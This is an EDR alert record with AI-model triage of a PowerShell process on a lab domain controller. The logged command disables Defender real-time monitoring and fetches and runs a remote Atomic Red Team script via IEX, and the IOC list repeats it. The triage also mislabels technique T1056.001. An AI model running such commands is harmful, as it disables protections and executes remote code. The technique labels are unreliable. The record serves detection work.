{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00023-WIN-PS_Invoke_Expression_Usage",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 193449984,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld6D5F.tmp.bat T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4567040,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 2440,
        "THIS_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "THREADS": 3,
        "TIMESTAMP": 1774364725358,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 2440,
      "PROCESS_ID": 3164,
      "THREADS": 32,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
      "event_time": 1774364726507,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3164,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "0c13305cb3f73d15515e789969c2a835",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "6b593eddb775332b5050941f69c2a838"
    }
  },
  "detect_id": "1dc82d27-7f95-494f-8495-d73469c2a839",
  "detect_mtd": {
    "description": "Invoke-Expression is a Powershell commandlet that evaluates and executes a string as a command. Adversaries and frameworks such as Empire use this technique to pull encoded implants from websites as strings and execute them. This detector looks for the use of Invoke-Expression in the commandline of a Powershell process.",
    "falsepositives": [
      "Invoke-Expression used in combination with NuGet, Chef, Puppet, or other administrator like functions is all normal behavior."
    ],
    "references": [
      "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-6",
      "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf",
      "https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf",
      "https://isc.sans.edu/diary/Malicious+Powershell+Script+Dissection/24282"
    ],
    "tags": [
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364729671,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364726\u0026selected=6b593eddb775332b5050941f69c2a838",
  "namespace": "general",
  "priority": 2,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "421a9c48-037c-4e7b-8016-81c0d6083fd0",
    "event_time": 1774364726507,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3164,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "0c13305cb3f73d15515e789969c2a835",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "6b593eddb775332b5050941f69c2a838"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-PS_Invoke_Expression_Usage",
  "ts": 1774364729000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.925,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned during this PowerShell session?",
    "Was there any data exfiltration or file modification detected alongside this execution?",
    "Are there similar commands in the batch script (cmd.exe) that triggered this?"
  ],
  "ioc_analysis": "The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for path-based detection. However, the command line contains malicious indicators: IEX with an external URL, disabling antivirus monitoring, and invoking Atomic Red Team modules. The parent process chain shows cmd.exe spawning PowerShell, suggesting a batch script execution pattern.",
  "iocs_extracted": [
    {
      "type": "command_line",
      "value": "Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs"
    },
    {
      "type": "url",
      "value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
    },
    {
      "type": "technique",
      "value": "T1056.001 (User Execution via Command Line)"
    }
  ],
  "mitre_techniques": [
    "T1056.001",
    "T1567.002"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to raw.githubusercontent.com at the network perimeter",
    "Review and terminate all child processes spawned by this session",
    "Check for persistence mechanisms in startup locations (Run keys, scheduled tasks)",
    "Collect memory dump for forensic analysis of injected payloads"
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/2 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell using IEX (Invoke-Expression) to download and execute code from an external GitHub repository. The command explicitly disables real-time monitoring and installs the Atomic Red Team framework, indicating active offensive operations rather than legitimate administrative tasks.\n\n**IOC Analysis:** The process is running from its expected location (C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe) and is Microsoft-signed, which creates a false positive scenario for path-based detection. However, the command line contains malicious indicators: IEX with an external URL, disabling antivirus monitoring, and invoking Atomic Red Team modules. The parent process chain shows cmd.exe spawning PowerShell, suggesting a batch script execution pattern.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.9\nThe PowerShell process running from C:\\Windows\\System32 with a malicious command line that disables security monitoring and downloads red team scripts is highly suspicious, despite the legitimate file path and signature.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Microsoft-signed PowerShell executable in the expected directory, but the command line includes actions like disabling Windows Defender real-time monitoring and downloading scripts from GitHub, which are indicative of malicious intent. The HASH matches a known Microsoft-signed binary, but the behavior suggests potential exploitation.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 90% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.9,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}